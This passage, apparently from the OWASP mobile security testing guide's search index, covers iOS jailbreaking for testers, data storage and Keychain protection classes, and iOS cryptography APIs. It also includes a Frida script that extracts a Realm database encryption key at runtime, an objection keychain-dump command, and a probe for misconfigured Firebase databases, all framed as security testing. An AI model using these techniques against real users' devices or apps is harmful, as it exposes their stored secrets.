Some apps attempt to detect whether the iOS device on which they're running is jailbroken. This is because jailbreaking deactivates some of iOS' default security mechanisms. However, there are several ways to get around these detections, and we'll introduce them in the chapter \"iOS Anti-Reversing Defenses\".
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#benefits-of-jailbreaking","title":"Benefits of Jailbreaking","text":"End users often jailbreak their devices to tweak the iOS system's appearance, add new features, and install third-party apps from unofficial app stores. For a security tester, however, jailbreaking an iOS device has even more benefits. They include, but aren't limited to, the following:
There are tethered, semi-tethered, semi-untethered, and untethered jailbreaks.
Tethered jailbreaks don't persist through reboots, so re-applying jailbreaks requires the device to be connected (tethered) to a computer during every reboot. The device may not reboot at all if the computer is not connected.
Semi-tethered jailbreaks can't be re-applied unless the device is connected to a computer during reboot. The device can also boot into non-jailbroken mode on its own.
Semi-untethered jailbreaks allow the device to boot on its own, but the kernel patches (or user-land modifications) for disabling code signing aren't applied automatically. The user must re-jailbreak the device by starting an app or visiting a website (not requiring a connection to a computer, hence the term untethered).
Untethered jailbreaks are the most popular choice for end users because they need to be applied only once, after which the device will be permanently jailbroken.
Developing a jailbreak for iOS is becoming more and more complicated as Apple continues to harden their OS. Whenever Apple becomes aware of a vulnerability, it is patched and a system update is pushed out to all users. As it is not possible to downgrade to a specific version of iOS, and since Apple only allows you to update to the latest iOS version, it is a challenge to have a device which is running a version of iOS for which a jailbreak is available. Some vulnerabilities cannot be patched by software, such as the checkm8 exploit affecting the BootROM of all CPUs until A12.
If you have a jailbroken device that you use for security testing, keep it as is unless you're 100% sure that you can re-jailbreak it after upgrading to the latest iOS version. Consider getting one (or multiple) spare device(s) (which will be updated with every major iOS release) and waiting for a jailbreak to be released publicly. Apple is usually quick to release a patch once a jailbreak has been released publicly, so you only have a couple of days to downgrade (if it is still signed by Apple) to the affected iOS version and apply the jailbreak.
iOS upgrades are based on a challenge-response process (generating the so-called SHSH blobs as a result). The device will allow the OS installation only if the response to the challenge is signed by Apple. This is what researchers call a \"signing window\", and it is the reason you can't simply store the OTA firmware package you downloaded and load it onto the device whenever you want to. During minor iOS upgrades, two versions may both be signed by Apple (the latest one, and the previous iOS version). This is the only situation in which you can downgrade the iOS device. You can check the current signing window and download OTA firmware from the IPSW Downloads website.
For some devices and iOS versions, it is possible to downgrade to older versions in case the SHSH blobs for that device were collected when the signing window was active. More information on this can be found on the cfw iOS Guide - Saving Blobs
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#which-jailbreaking-tool-to-use","title":"Which Jailbreaking Tool to Use","text":"Different iOS versions require different jailbreaking techniques. Determine whether a public jailbreak is available for your version of iOS. Beware of fake tools and spyware, which are often hiding behind domain names that are similar to the name of the jailbreaking group/author.
The iOS jailbreak scene evolves so rapidly that providing up-to-date instructions is difficult. However, we can point you to some sources that are currently reliable.
Note that any modification you make to your device is at your own risk. While jailbreaking is typically safe, things can go wrong and you may end up bricking your device. No other party except yourself can be held accountable for any damage.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/","title":"iOS Data Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#overview","title":"Overview","text":"The protection of sensitive data, such as authentication tokens and private information, is key for mobile security. In this chapter, you'll learn about the iOS APIs for local data storage, and best practices for using them.
As little sensitive data as possible should be saved in permanent local storage. However, in most practical scenarios, at least some user data must be stored. Fortunately, iOS offers secure storage APIs, which allow developers to use the cryptographic hardware available on every iOS device. If these APIs are used correctly, sensitive data and files can be secured via hardware-backed 256-bit AES encryption.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsdata-and-nsmutabledata","title":"NSData and NSMutableData","text":"NSData
(static data objects) and NSMutableData
(dynamic data objects) are typically used for data storage, but they are also useful for distributed objects applications, in which data contained in data objects can be copied or moved between applications. The following are methods used to write NSData
objects:
NSDataWritingWithoutOverwriting
NSDataWritingFileProtectionNone
NSDataWritingFileProtectionComplete
NSDataWritingFileProtectionCompleteUnlessOpen
NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication
writeToFile
: stores data as part of the NSData
classNSSearchPathForDirectoriesInDomains, NSTemporaryDirectory
: used to manage file pathsNSFileManager
: lets you examine and change the contents of the file system. You can use createFileAtPath
to create a file and write to it.The following example shows how to create a complete
encrypted file using the FileManager
class. You can find more information in the Apple Developer Documentation \"Encrypting Your App's Files\"
Swift:
FileManager.default.createFile(\n atPath: filePath,\n contents: \"secret text\".data(using: .utf8),\n attributes: [FileAttributeKey.protectionKey: FileProtectionType.complete]\n)\n
Objective-C:
[[NSFileManager defaultManager] createFileAtPath:[self filePath]\n contents:[@\"secret text\" dataUsingEncoding:NSUTF8StringEncoding]\n attributes:[NSDictionary dictionaryWithObject:NSFileProtectionComplete\n forKey:NSFileProtectionKey]];\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsuserdefaults","title":"NSUserDefaults","text":"The NSUserDefaults
class provides a programmatic interface for interacting with the default system. The default system allows an application to customize its behavior according to user preferences. Data saved by NSUserDefaults
can be viewed in the application bundle. This class stores data in a plist file, but it's meant to be used with small amounts of data.
Core Data
is a framework for managing the model layer of objects in your application. It provides general and automated solutions to common tasks associated with object life cycles and object graph management, including persistence. Core Data can use SQLite as its persistent store, but the framework itself is not a database.
CoreData does not encrypt its data by default. As part of a research project (iMAS) from the MITRE Corporation, which focused on open source iOS security controls, an additional encryption layer can be added to CoreData. See the GitHub Repo for more details.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#sqlite-databases","title":"SQLite Databases","text":"The SQLite 3 library must be added to an app if the app is to use SQLite. This library is written in C and provides an API for the SQLite commands.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#firebase-real-time-databases","title":"Firebase Real-time Databases","text":"Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://\\<firebaseProjectName\\>.firebaseio.com/.json
The firebaseProjectName can be retrieved from the property list(.plist) file. For example, PROJECT_ID
key stores the corresponding Firebase project name in GoogleService-Info.plist file.
Alternatively, analysts can use Firebase Scanner, a Python script that automates the task above, as shown below:
python FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"Realm Objective-C and Realm Swift aren't supplied by Apple, but they are still worth noting. They store everything unencrypted, unless the configuration has encryption enabled.
The following example demonstrates how to use encryption with a Realm database:
// Open the encrypted Realm file where getKey() is a method to obtain a key from the Keychain or a server\nlet config = Realm.Configuration(encryptionKey: getKey())\ndo {\n let realm = try Realm(configuration: config)\n // Use the Realm as normal\n} catch let error as NSError {\n // If the encryption key is wrong, `error` will say that it's an invalid database\n fatalError(\"Error opening realm: \\(error)\")\n}\n
Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as NSUserDefaults, or securely in the platform's Keychain (which is best practice). However, if an attacker has sufficient access to the device (e.g. jailbroken access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
function nsdataToHex(data) {\n var hexStr = '';\n for (var i = 0; i < data.length(); i++) {\n var byte = Memory.readU8(data.bytes().add(i));\n hexStr += ('0' + (byte & 0xFF).toString(16)).slice(-2);\n }\n return hexStr;\n}\n\nfunction HookRealm() {\n if (ObjC.available) {\n console.log(\"ObjC is available. Attempting to intercept Realm classes...\");\n const RLMRealmConfiguration = ObjC.classes.RLMRealmConfiguration;\n Interceptor.attach(ObjC.classes.RLMRealmConfiguration['- setEncryptionKey:'].implementation, {\n onEnter: function(args) {\n var encryptionKeyData = new ObjC.Object(args[2]);\n console.log(`Encryption Key Length: ${encryptionKeyData.length()}`);\n // Hexdump the encryption key\n var encryptionKeyBytes = encryptionKeyData.bytes();\n console.log(hexdump(encryptionKeyBytes, {\n offset: 0,\n length: encryptionKeyData.length(),\n header: true,\n ansi: true\n }));\n\n // Convert the encryption key bytes to a hex string\n var encryptionKeyHex = nsdataToHex(encryptionKeyData);\n console.log(`Encryption Key Hex: ${encryptionKeyHex}`);\n },\n onLeave: function(retval) {\n console.log('Leaving RLMRealmConfiguration.- setEncryptionKey:');\n }\n });\n\n }\n\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#couchbase-lite-databases","title":"Couchbase Lite Databases","text":"Couchbase Lite is a lightweight, embedded, document-oriented (NoSQL) database engine that can be synced. It compiles natively for iOS and macOS.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#yapdatabase","title":"YapDatabase","text":"YapDatabase is a key/value store built on top of SQLite.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#user-interface","title":"User Interface","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#ui-components","title":"UI Components","text":"Entering sensitive information when, for example, registering an account or making payments, is an essential part of using many apps. This data may be financial information such as credit card data or user account passwords. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing effect when an application is started or exited, so they introduced the concept of saving a screenshot when the application goes into the background. This feature can pose a security risk because screenshots (which may display sensitive information such as an email or corporate documents) are written to local storage, where they can be recovered by a rogue application with a sandbox bypass exploit or someone who steals the device.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"Several options, such as autocorrect and spell check, are available to users to simplify keyboard input and are cached by default in .dat
files in /private/var/mobile/Library/Keyboard/
and its subdirectories.
The UITextInputTraits protocol is used for keyboard caching. The UITextField
, UITextView
, and UISearchBar
classes automatically support this protocol and it offers the following properties:
var autocorrectionType: UITextAutocorrectionType
determines whether autocorrection is enabled during typing. When autocorrection is enabled, the text object tracks unknown words and suggests suitable replacements, replacing the typed text automatically unless the user overrides the replacement. The default value of this property is UITextAutocorrectionTypeDefault
, which for most input methods enables autocorrection.var secureTextEntry: BOOL
determines whether text copying and text caching are disabled and hides the text being entered for UITextField
. The default value of this property is NO
.App developers can leverage the iOS Data Protection APIs to implement fine-grained access control for user data stored in flash memory. The APIs are built on top of the Secure Enclave Processor (SEP), which was introduced with the iPhone 5S. The SEP is a coprocessor that provides cryptographic operations for data protection and key management. A device-specific hardware key-the device UID (Unique ID)-is embedded in the secure enclave, ensuring the integrity of data protection even when the operating system kernel is compromised.
You can learn more about the Secure Enclave in this BlackHat presentation \"Demystifying the Secure Enclave Processor\" by Tarjei Mandt, Mathew Solnik and David Wang.
The data protection architecture is based on a hierarchy of keys. The UID and the user passcode key (which is derived from the user's passphrase via the PBKDF2 algorithm) sit at the top of this hierarchy. Together, they can be used to \"unlock\" so-called class keys, which are associated with different device states (e.g., device locked/unlocked).
Every file stored on the iOS file system is encrypted with its own per-file key, which is contained in the file metadata. The metadata is encrypted with the file system key and wrapped with the class key corresponding to the protection class the app selected when creating the file.
The following illustration shows the iOS Data Protection Key Hierarchy.
Files can be assigned to one of four different protection classes, which are explained in more detail in the iOS Security Guide:
Complete Protection (NSFileProtectionComplete): A key derived from the user passcode and the device UID protects this class key. The derived key is wiped from memory shortly after the device is locked, making the data inaccessible until the user unlocks the device.
Protected Unless Open (NSFileProtectionCompleteUnlessOpen): This protection class is similar to Complete Protection, but, if the file is opened when unlocked, the app can continue to access the file even if the user locks the device. This protection class is used when, for example, a mail attachment is downloading in the background.
Protected Until First User Authentication (NSFileProtectionCompleteUntilFirstUserAuthentication): The file can be accessed as soon as the user unlocks the device for the first time after booting. It can be accessed even if the user subsequently locks the device and the class key is not removed from memory.
No Protection (NSFileProtectionNone): The key for this protection class is protected with the UID only. The class key is stored in \"Effaceable Storage\", which is a region of flash memory on the iOS device that allows the storage of small amounts of data. This protection class exists for fast remote wiping (immediate deletion of the class key, which makes the data inaccessible).
All class keys except NSFileProtectionNone
are encrypted with a key derived from the device UID and the user's passcode. As a result, decryption can happen only on the device itself and requires the correct passcode.
Since iOS 7, the default data protection class is \"Protected Until First User Authentication\".
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#external-storage","title":"External Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#the-keychain","title":"The Keychain","text":"The iOS Keychain can be used to securely store short, sensitive bits of data, such as encryption keys and session tokens. It is implemented as an SQLite database that can be accessed through the Keychain APIs only.
On macOS, every user application can create as many Keychains as desired, and every login account has its own Keychain. The structure of the Keychain on iOS is different: only one Keychain is available to all apps. Access to the items can be shared between apps signed by the same developer via the access groups feature of the attribute kSecAttrAccessGroup
. Access to the Keychain is managed by the securityd
daemon, which grants access according to the app's Keychain-access-groups
, application-identifier
, and application-group
entitlements.
The Keychain API includes the following main operations:
SecItemAdd
SecItemUpdate
SecItemCopyMatching
SecItemDelete
Data stored in the Keychain is protected via a class structure that is similar to the class structure used for file encryption. Items added to the Keychain are encoded as a binary plist and encrypted with a 128-bit AES per-item key in Galois/Counter Mode (GCM). Note that larger blobs of data aren't meant to be saved directly in the Keychain-that's what the Data Protection API is for. You can configure data protection for Keychain items by setting the kSecAttrAccessible
key in the call to SecItemAdd
or SecItemUpdate
. The following configurable accessibility values for kSecAttrAccessible are the Keychain Data Protection classes:
kSecAttrAccessibleAlways
: The data in the Keychain item can always be accessed, regardless of whether the device is locked.kSecAttrAccessibleAlwaysThisDeviceOnly
: The data in the Keychain item can always be accessed, regardless of whether the device is locked. The data won't be included in an iCloud or local backup.kSecAttrAccessibleAfterFirstUnlock
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user.kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.kSecAttrAccessibleWhenUnlocked
: The data in the Keychain item can be accessed only while the device is unlocked by the user.kSecAttrAccessibleWhenUnlockedThisDeviceOnly
: The data in the Keychain item can be accessed only while the device is unlocked by the user. The data won't be included in an iCloud or local backup.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
: The data in the Keychain can be accessed only when the device is unlocked. This protection class is only available if a passcode is set on the device. The data won't be included in an iCloud or local backup.AccessControlFlags
define the mechanisms with which users can authenticate the key (SecAccessControlCreateFlags
):
kSecAccessControlDevicePasscode
: Access the item via a passcode.kSecAccessControlBiometryAny
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint won't invalidate the item.kSecAccessControlBiometryCurrentSet
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint will invalidate the item.kSecAccessControlUserPresence
: Access the item via either one of the registered fingerprints (using Touch ID) or default to the passcode.Please note that keys secured by Touch ID (via kSecAccessControlBiometryAny
or kSecAccessControlBiometryCurrentSet
) are protected by the Secure Enclave: The Keychain holds a token only, not the actual key. The key resides in the Secure Enclave.
Starting with iOS 9, you can do ECC-based signing operations in the Secure Enclave. In that scenario, the private key and the cryptographic operations reside within the Secure Enclave. See the static analysis section for more info on creating the ECC keys. iOS 9 supports only 256-bit ECC. Furthermore, you need to store the public key in the Keychain because it can't be stored in the Secure Enclave. After the key is created, you can use the kSecAttrKeyType
to indicate the type of algorithm you want to use the key with.
In case you want to use these mechanisms, it is recommended to test whether the passcode has been set. In iOS 8, you will need to check whether you can read/write from an item in the Keychain protected by the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute. From iOS 9 onward you can check whether a lock screen is set, using LAContext
:
Swift:
public func devicePasscodeEnabled() -> Bool {\n return LAContext().canEvaluatePolicy(.deviceOwnerAuthentication, error: nil)\n}\n
Objective-C:
-(BOOL)devicePasscodeEnabled:(LAContext)context{\n if ([context canEvaluatePolicy:LAPolicyDeviceOwnerAuthentication error:nil]) {\n return true;\n } else {\n return false;\n }\n}\n
Here is sample Swift code you can use to create keys (Notice the kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave
: this indicates that we want to use the Secure Enclave directly.):
// private key parameters\nlet privateKeyParams = [\n    kSecAttrLabel as String: \"privateLabel\",\n    kSecAttrIsPermanent as String: true,\n    kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// public key parameters\nlet publicKeyParams = [\n    kSecAttrLabel as String: \"publicLabel\",\n    kSecAttrIsPermanent as String: false,\n    kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// global parameters\nlet parameters = [\n    kSecAttrKeyType as String: kSecAttrKeyTypeEC,\n    kSecAttrKeySizeInBits as String: 256,\n    kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave,\n    kSecPublicKeyAttrs as String: publicKeyParams,\n    kSecPrivateKeyAttrs as String: privateKeyParams,\n] as CFDictionary\n\nvar pubKey, privKey: SecKey?\nlet status = SecKeyGeneratePair(parameters, &pubKey, &privKey)\n\nif status != errSecSuccess {\n    // Key generation failed, handle the error\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keychain-data-persistence","title":"Keychain Data Persistence","text":"On iOS, when an application is uninstalled, the Keychain data used by the application is retained by the device, unlike the data stored by the application sandbox which is wiped. In the event that a user sells their device without performing a factory reset, the buyer of the device may be able to gain access to the previous user's application accounts and data by reinstalling the same applications used by the previous user. This would require no technical ability to perform.
When assessing an iOS application, you should look for Keychain data persistence. This is normally done by using the application to generate sample data that may be stored in the Keychain, uninstalling the application, then reinstalling the application to see whether the data was retained between application installations. Use objection runtime mobile exploration toolkit to dump the keychain data. The following objection
command demonstrates this procedure:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
There's no iOS API that developers can use to force wipe data when an application is uninstalled. Instead, developers should take the following steps to prevent Keychain data from persisting between application installations:
let userDefaults = UserDefaults.standard\n\nif userDefaults.bool(forKey: \"hasRunBefore\") == false {\n // Remove Keychain items here\n\n // Update the flag indicator\n userDefaults.set(true, forKey: \"hasRunBefore\")\n}\n
There are many legitimate reasons for creating log files on a mobile device, including keeping track of crashes or errors that are stored locally while the device is offline (so that they can be sent to the app's developer once online), and storing usage statistics. However, logging sensitive data, such as credit card numbers and session information, may expose the data to attackers or malicious applications. Log files can be created in several ways. The following list shows the methods available on iOS:
iOS includes auto-backup features that create copies of the data stored on the device. You can make iOS backups from your host computer by using iTunes (till macOS Catalina) or Finder (from macOS Catalina onwards), or via the iCloud backup feature. In both cases, the backup includes nearly all data stored on the iOS device except highly sensitive data such as Apple Pay information and Touch ID settings.
Since iOS backs up installed apps and their data, an obvious concern is whether sensitive user data stored by the app might unintentionally leak through the backup. Another concern, though less obvious, is whether sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behavior after restoring a modified backup. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#how-the-keychain-is-backed-up","title":"How the Keychain Is Backed Up","text":"When users back up their iOS device, the Keychain data is backed up as well, but the secrets in the Keychain remain encrypted. The class keys necessary to decrypt the Keychain data aren't included in the backup. Restoring the Keychain data requires restoring the backup to a device and unlocking the device with the user's passcode.
Keychain items for which the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute is set can be decrypted only if the backup is restored to the backed up device. Someone trying to extract this Keychain data from the backup couldn't decrypt it without access to the crypto hardware inside the originating device.
One caveat to using the Keychain, however, is that it was only designed to store small bits of user data or short notes (according to Apple's documentation on Keychain Services). This means that apps with larger local secure storage needs (e.g., messaging apps, etc.) should encrypt the data within the app container, but use the Keychain to store key material. In cases where sensitive configuration settings (e.g., data loss prevention policies, password policies, compliance policies, etc) must remain unencrypted within the app container, you can consider storing a hash of the policies in the keychain for integrity checking. Without an integrity check, these settings could be modified within a backup and then restored back to the device to modify app behavior (e.g., change configured remote endpoints) or security settings (e.g., jailbreak detection, certificate pinning, maximum UI login attempts, etc.).
The takeaway: If sensitive data is handled as recommended earlier in this chapter (e.g., stored in the Keychain, with Keychain-backed integrity checks, or encrypted with a key that's locked inside the Keychain), backups shouldn't be a security issue.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"Analyzing memory can help developers to identify the root causes of problems such as application crashes. However, it can also be used to access sensitive data. This section describes how to check a process's memory for data disclosure.
First, identify the sensitive information that's stored in memory. Sensitive assets are very likely to be loaded into memory at some point. The objective is to make sure that this info is exposed as briefly as possible.
To investigate an application's memory, first create a memory dump. Alternatively, you can analyze the memory in real time with, for example, a debugger. Regardless of the method you use, this is a very error-prone process because dumps provide the data left by executed functions and you might miss executing critical steps. In addition, overlooking data during analysis is quite easy to do unless you know the footprint of the data you're looking for (either its exact value or its format). For example, if the app encrypts according to a randomly generated symmetric key, you're very unlikely to spot the key in memory unless you find its value by other means.
Before looking into the source code, checking the documentation and identifying application components provide an overview of where data might be exposed. For example, while sensitive data received from a backend exists in the final model object, multiple copies may also exist in the HTTP client or the XML parser. All these copies should be removed from memory as soon as possible.
Understanding the application's architecture and its interaction with the OS will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without needing any additional processing. That data can be received and handled in encrypted form, which prevents exposure via memory.
However, if sensitive data does need to be exposed via memory, make sure that your app exposes as few copies of this data as possible for as little time as possible. In other words, you want centralized handling of sensitive data, based on primitive and mutable data structures.
Such data structures give developers direct access to memory. Make sure that this access is used to overwrite the sensitive data and cryptographic keys with zeroes. Apple Secure Coding Guide suggests zeroing sensitive data after usage, but provides no recommended ways of doing this.
Examples of preferable data types include char []
and int []
, but not NSString
or String
. Whenever you try to modify an immutable object, such as a String
, you actually create a copy and change the copy. Consider using NSMutableData
for storing secrets on Swift/Objective-C and use resetBytes(in:)
method for zeroing. Also, see Clean memory of secret data for reference.
Avoid Swift data types other than collections regardless of whether they are considered mutable. Many Swift data types hold their data by value, not by reference. Although this allows modification of the memory allocated to simple types like char
and int
, handling a complex type such as String
by value involves a hidden layer of objects, structures, or primitive arrays whose memory can't be directly accessed or modified. Certain types of usage may seem to create a mutable data object (and even be documented as doing so), but they actually create a mutable identifier (variable) instead of an immutable identifier (constant). For example, many think that the following results in a mutable String
in Swift, but this is actually an example of a variable whose complex value can be changed (replaced, not modified in place):
var str1 = \"Goodbye\" // \"Goodbye\", base address: 0x0001039e8dd0\nstr1.append(\" \") // \"Goodbye \", base address: 0x608000064ae0\nstr1.append(\"cruel world!\") // \"Goodbye cruel world\", base address: 0x6080000338a0\nstr1.removeAll() // \"\", base address 0x00010bd66180\n
Notice that the base address of the underlying value changes with each string operation. Here is the problem: To securely erase the sensitive information from memory, we don't want to simply change the value of the variable; we want to change the actual content of the memory allocated for the current value. Swift doesn't offer such a function.
Swift collections (Array
, Set
, and Dictionary
), on the other hand, may be acceptable if they collect primitive data types such as char
or int
and are defined as mutable (i.e., as variables instead of constants), in which case they are more or less equivalent to a primitive array (such as char []
). These collections provide memory management, which can result in unidentified copies of the sensitive data in memory if the collection needs to copy the underlying buffer to a different location to extend it.
Using mutable Objective-C data types, such as NSMutableString
, may also be acceptable, but these types have the same memory issue as Swift collections. Pay attention when using Objective-C collections; they hold data by reference, and only Objective-C data types are allowed. Therefore, we are looking, not for a mutable collection, but for a collection that references mutable objects.
As we've seen so far, using Swift or Objective-C data types requires a deep understanding of the language implementation. Furthermore, there has been some core re-factoring in between major Swift versions, resulting in many data types' behavior being incompatible with that of other types. To avoid these issues, we recommend using primitive data types whenever data needs to be securely erased from memory.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. Not even Apple considers this issue in the official iOS SDK API. For example, most of the APIs for data transformation (parsers, serializers, etc.) operate on non-primitive data types. Similarly, regardless of whether you flag some UITextField
as Secure Text Entry or not, it always returns data in the form of a String
or NSString
.
Inter Process Communication (IPC) allows processes to send each other messages and data. For processes that need to communicate with each other, there are different ways to implement IPC on iOS:
launchd
. It is the most secure and flexible implementation of IPC on iOS and should be the preferred method. It runs in the most restricted environment possible: sandboxed with no root privilege escalation and minimal file system access and network access. Two different APIs are used with XPC Services:NSFileCoordinator
can be used to manage and send data to and from apps via files that are available on the local file system to various processes. NSFileCoordinator methods run synchronously, so your code will be blocked until they stop executing. That's convenient because you don't have to wait for an asynchronous block callback, but it also means that the methods block the running thread.In the \"Mobile App Cryptography\" chapter, we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on iOS's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices linked from this guide.
Apple provides libraries that include implementations of most common cryptographic algorithms. Apple's Cryptographic Services Guide is a great reference. It contains generalized documentation of how to use standard libraries to initialize and use cryptographic primitives, information that is useful for source code analysis.
"},{"location":"MASTG/iOS/0x06e-Testing-Cryptography/#cryptokit","title":"CryptoKit","text":"Apple CryptoKit was released with iOS 13 and is built on top of Apple's native cryptographic library corecrypto which is FIPS 140-2 validated. The Swift framework provides a strongly typed API interface, has effective memory management, conforms to equatable, and supports generics. CryptoKit contains secure algorithms for hashing, symmetric-key cryptography, and public-key cryptography. The framework can also utilize the hardware based key manager from the Secure Enclave.
Apple CryptoKit contains the following algorithms:
Hashes:
Symmetric-Key:
Public-Key:
Examples:
Generating and releasing a symmetric key:
let encryptionKey = SymmetricKey(size: .bits256)\n
Calculating a SHA-2 512-bit digest:
let rawString = \"OWASP MASTG\"\nlet rawData = Data(rawString.utf8)\nlet hash = SHA512.hash(data: rawData) // Compute the digest\nlet textHash = String(describing: hash)\nprint(textHash) // Print hash text\n
For more information about Apple CryptoKit, please visit the following resources:
The most commonly used Class for cryptographic operations is the CommonCrypto, which is packed with the iOS runtime. The functionality offered by the CommonCrypto object can best be dissected by having a look at the source code of the header file:
CommonCryptor.h
gives the parameters for the symmetric cryptographic operations.CommonDigest.h
gives the parameters for the hashing Algorithms.CommonHMAC.h
gives the parameters for the supported HMAC operations.CommonKeyDerivation.h
gives the parameters for supported KDF functions.CommonSymmetricKeywrap.h
gives the function used for wrapping a symmetric key with a Key Encryption Key. Unfortunately, CommonCryptor lacks a few types of operations in its public APIs, such as GCM mode, which is only available in its private APIs (see its source code). For this, an additional binding header is necessary or other wrapper libraries can be used.
Next, for asymmetric operations, Apple provides SecKey. Apple provides a nice guide in its Developer Documentation on how to use this.
As noted before: some wrapper-libraries exist for both in order to provide convenience. Typical libraries that are used are, for instance:
There are various third party libraries available, such as:
There are various methods on how to store the key on the device. Not storing a key at all will ensure that no key material can be dumped. This can be achieved by using a Password-Based Key Derivation Function, such as PBKDF2. See the example below:
func pbkdf2SHA1(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA1), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA256(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA256), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA512(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA512), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2(hash: CCPBKDFAlgorithm, password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n let passwordData = password.data(using: String.Encoding.utf8)!\n var derivedKeyData = Data(repeating: 0, count: keyByteCount)\n let derivedKeyDataLength = derivedKeyData.count\n let derivationStatus = derivedKeyData.withUnsafeMutableBytes { derivedKeyBytes in\n salt.withUnsafeBytes { saltBytes in\n\n CCKeyDerivationPBKDF(\n CCPBKDFAlgorithm(kCCPBKDF2),\n password, passwordData.count,\n saltBytes, salt.count,\n hash,\n UInt32(rounds),\n derivedKeyBytes, derivedKeyDataLength\n )\n }\n }\n if derivationStatus != 0 {\n // Error\n return nil\n }\n\n return derivedKeyData\n}\n\nfunc testKeyDerivation() {\n let password = \"password\"\n let salt = Data([0x73, 0x61, 0x6C, 0x74, 0x44, 0x61, 0x74, 0x61])\n let keyByteCount = 16\n let rounds = 100_000\n\n let derivedKey = pbkdf2SHA1(password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n
Arcane
libraryWhen you need to store the key, it is recommended to use the Keychain as long as the protection class chosen is not kSecAttrAccessibleAlways
. Storing keys in any other location, such as the NSUserDefaults
, property list files or by any other sink from Core Data or Realm, is usually less secure than using the KeyChain. Even when the sync of Core Data or Realm is protected by using NSFileProtectionComplete
data protection class, we still recommend using the KeyChain. See the chapter \"Data Storage on iOS\" for more details.
